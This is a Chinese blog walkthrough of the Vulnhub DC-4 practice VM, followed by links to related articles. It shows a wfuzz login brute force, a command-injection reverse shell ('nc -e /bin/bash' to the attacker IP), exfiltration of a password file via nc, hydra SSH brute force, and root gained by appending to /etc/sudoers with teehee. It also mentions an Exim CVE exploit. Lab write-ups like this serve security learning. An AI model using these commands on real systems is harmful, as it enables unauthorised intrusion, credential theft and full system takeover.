Vulnhub[DC4]

已于 2022-06-16 19:47:02 修改
阅读量275 收藏
点赞数
分类专栏: Vulnhub 文章标签: 安全 学习 网络
于 2022-06-14 09:03:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Townmacro/article/details/125271528
版权

简介

下载

  • DC-4.zip (Size: 617 MB)
  • Download: http://www.five86.com/downloads/DC-4.zip
  • Download (Mirror): https://download.vulnhub.com/dc/DC-4.zip
  • Download (Torrent): https://download.vulnhub.com/dc/DC-4.zip.torrent ( Magnet)

信息收集

主机探活

kali中使用arp-scan进行主机探活

arp-scan --interface eth0 192.168.0.0/24

经过筛选可以知道192.168.0.151是DC-4的ip

端口扫描

nmap  -sC -sV -p- 192.168.0.151

发现这里只是开了22、80端口

看下80端口,是一个登陆界面

登录页面,尝试弱口令登录

这里可以用Wfuzz来进行爆破

# -c :我记得是彩色输出
# -t :设置线程数量
# -w :字典文件
# -hw : 隐藏返回word字数为17的信息,这个靶机如果凭证错误的话word是17
# -d  : 请求体设置
wfuzz -c -t 20 -w /root/Desktop/fuzz/username.txt -w /root/Desktop/fuzz/password.txt --hw 17 -d "username=FUZZ&password=FUZ2Z" http://192.168.0.151/login.php

发现弱密码是可以爆破出来的

得到账号和密码

admin - happy

渗透

登陆

然后试一下

发现这类似于命令执行

burp抓包

可以发现这里直接就是传了一个ls -l的目录查看命令,中间的空格被换成了+

那这里我们直接传一个直接反弹shell

首先kali开启监听

将数据包发送到Repeater模块,然后改成nc+-e+/bin/bash+192.168.0.129+4444再发送

连接成功

用python转换成标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

查看下passwd看看有什么用户适合提权

发现charles、jim、sam这个三个用户

去它们的home目录看下有没有什么收获

charles:

没有啥发现

jim:

backups——备份

好东西

找到一个old-passwords.txt的备份

将这些密码复制下来并对jim进行ssh爆破,因为在信息收集的阶段我们看到靶机是打开了22端口

可以用nc进行文件传输

这里可以用nc进行文件传输

# Kali
nc -nvlp 5555 > old-passwords.txt
# DC4
nc 192.168.0.129 5555 < /home/jim/backups/old-passwords.bak

然后用hydra对jim账号进行SSH爆破

hydra -l jim -P old-passwords.txt ssh://192.168.0.151

[22][ssh] host: 192.168.0.151   login: jim   password: jibril04

登陆jim的ssh,查看有没有sudo权限

然后可以发现在登录SSH提示有邮件,查看下

这是一封Charles发送过来的邮件,里面是说他要放年假了,老板他把密码给jim

这下我们拿到了Charles的密码

^xHhA&hvim0y

ssh切换到Charles

查看Charles的sudo

可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件

我们可以借助teehee直接给charles赋予完全的root权限

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers

然后直接用sudo登录root用户

提权成功

非预期解

之前的方法应该就是这个靶机预设的预期解

但是在查看邮件的时候还有一个非预期解

这里可以了解到Exim的版本为4.89

这个版本有一个CVE-2019-10149可以使用

searchsploit Exim

searchsploit -p linux/local/46996.sh

开启python的HTTP服务

通过wget进行exp下载,赋予执行权限并执行

Townmacro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MBP M2安装wfuzz工具
weixin_47610939的博客
03-03 644
MacOS安装wfuzz工具
win11+python3.9+pycurl39+wfuzz3.1.0
woai_zhongguo的博客
04-10 797
win11安装wfuzzfuzz技术工具;wfuzz的安装
Prime(wfuzz模糊测试,CVE-2017-16695)
m0_66299232的博客
10-19 294
2.访问secret.txt ,有一个location.txt文件,并且 它让访问一个github地址。13.复制我的php-reverse-shell.php(github里有)文件的代码,进行保存。8.下载下来给个执行权限,运行后就是root权限,进入root目录,成功拿下!7.访问/etc/passwd文件,在最下面说找到password.txt。2.用find命令查找有suid执行权限的文件,没有利用信息。wfuzz模糊测试,CVE-2017-16695,内核漏洞提权
15款好用的web开源安全测试工具等你来
okcross0的博客
08-30 5334
ZAP支持在WINdows,UNIX/LINUX和Mac OS平台上工作,它可帮助用户查找Web应用中的多种安全漏洞,即使在开发或测试过程中它仍可以使用。SQLMap是一个流行的开源web应用安全测试工具,它可以自动地在目标网站中执行检测并利用网站数据库中的SQL注入漏洞。它包含多种特性,且拥有一个强劲引擎,可以毫不费力地执行渗透并对web应用的SQL注入漏洞进行查找。该安全测试工具旨在查找web应用中的安全漏洞,支持 Windows, Linux, and Macintosh平台,使用java开发。...
Python-wfuzz是一款Python开发的Web安全模糊测试工具
08-10
wfuzz 是一款Python开发的Web安全模糊测试工具
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub渗透测试靶场- DC-8
最新发布
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
wfuzz-1.4(wftp fuzz)
08-25
wfuzz-1.4
pythonweb安全工具_wfuzz 是一款Python开发的Web安全模糊测试工具
weixin_39957271的博客
12-18 221
Wfuzz - The Web FuzzerWfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the valu...
Wfuzz:一款强大的Web Fuzz测试工具 | 安装报错解决
Sp4rkW的博客
08-15 4252
Wfuzz是一个基于Python的Web爆破程序,它支持多种方法来测试WEB应用的漏洞。你可以审计参数、登录认证、GET/POST方式爆破的表单,并且可以发掘未公开的资源,比如目录、文件和头部之类的。 Wfuzz是一款为了评估WEB应用而生的FuzzFuzz是爆破的一种手段)工具,它基于一个简单的理念,即用给定的Payload去fuzz。它允许在HTTP请求里注入任何输入的值,针对不同的WEB...
python之pycurl、wfuzz模块安装
qq_43368538的博客
09-23 1006
win10+python3.6+pycurl+wfuzz 之前在安装wfuzz时遇到很多坑,希望分享出来能解决大家的问题! 安装wfuzz之前需安装pycurl,但在安装pycurl时遇到这个问题 pycurl: libcurl link-time ssl backends (schannel) do not include is different from compile-time ssl backend (openssl) 试了所有的方法都不行,最后发现pycurl的7.44.1版本不稳定,因此安装
wfuzz 教程
wxh09的博客
03-05 3431
Wfuzz是一个为暴力破解Web应用程序而设计的工具,它可以用于查找未链接的资源(目录,servlet,脚本等),暴力GET和POST参数以检查不同类型的注入(SQL,XSS,LDAP等),强力表单参数(用户/密码),Fuzzing等。 Wfuzz一些功能: 具有多个词典的多注入点功能 递归(当做目录暴力时) 发布,标头和认证数据暴力强制 输出到HTML 彩色输出 按返回码,字数,行号,正则表达...
WFUZZ使用教程
热门推荐
JBlock的博客
03-17 2万+
文章目录简介Wfuzz基本功爆破文件、目录遍历枚举参数值POST请求测试Cookie测试HTTP Headers测试测试HTTP请求方法(Method)使用代理认证递归测试并发和间隔保存测试结果Wfuzz高阶功法IteratorszipchainproductEncoders**使用多个Encoder:**Scripts使用Scripts自定义插件技巧网络异常超时结合BurpSuite过滤器字典 ...
渗透测试 10 --- 扫描 web目录 (dirb、wfuzz、wpscan、nikto)
墨鱼菜鸡
07-17 3333
github 更多工具:https://github.com/topics/dirb githubfuzz 工具、字典:https://github.com/search?q=fuzz 当使用一个工具扫描完成后,如果没发现漏洞,可以使用其他 web 扫描工具再扫描下,因为每个工具可能侧重点不一样,扫描出来的漏洞就不一样。 关键字 ...
Wfuzz(支持各种web漏洞扫描的工具)
weixin_30463341的博客
08-19 311
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking dif...
Synthesis_tool_command
09-02
版本P-2019.03-SP4是DC的一个更新版本,发布于2019年9月,用户应根据实际需求选择合适版本。 10. **版权与法律声明** Synopsys对其软件拥有版权,并要求用户在许可协议范围内使用。该软件受美国出口管制法规约束...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值